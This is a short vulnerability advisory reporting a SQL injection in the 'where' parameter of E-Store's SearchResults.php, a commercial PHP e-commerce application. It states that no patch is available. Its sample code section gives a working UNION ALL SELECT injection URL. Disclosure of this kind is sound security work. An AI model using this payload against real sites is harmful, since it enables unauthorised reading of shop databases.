E-Store SQL Injection Vulnerability

Name    E-Store
Vendor  http://www.getaphpsite.com

Author  Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date    2009-09-03
10
X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE
19
20
I. ABOUT THE APPLICATION

E-Store is a commercial PHP e-commerce application.
24
25
II. DESCRIPTION

This application contains a SQL injection vulnerability.
29
30
III. ANALYSIS

Summary:

A) SQL Injection

A) SQL Injection

The GET parameter where, passed to SearchResults.php, is not
properly sanitised before being used in the query. Because the
affected query uses the parameter as an unquoted identifier (a
column name), escaping quotes does not help: the injection works
even when the Magic Quotes GPC flag (php.ini) is on.
42
43
IV. SAMPLE CODE

http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
48
49
V. FIX

No patch.
12/11/2009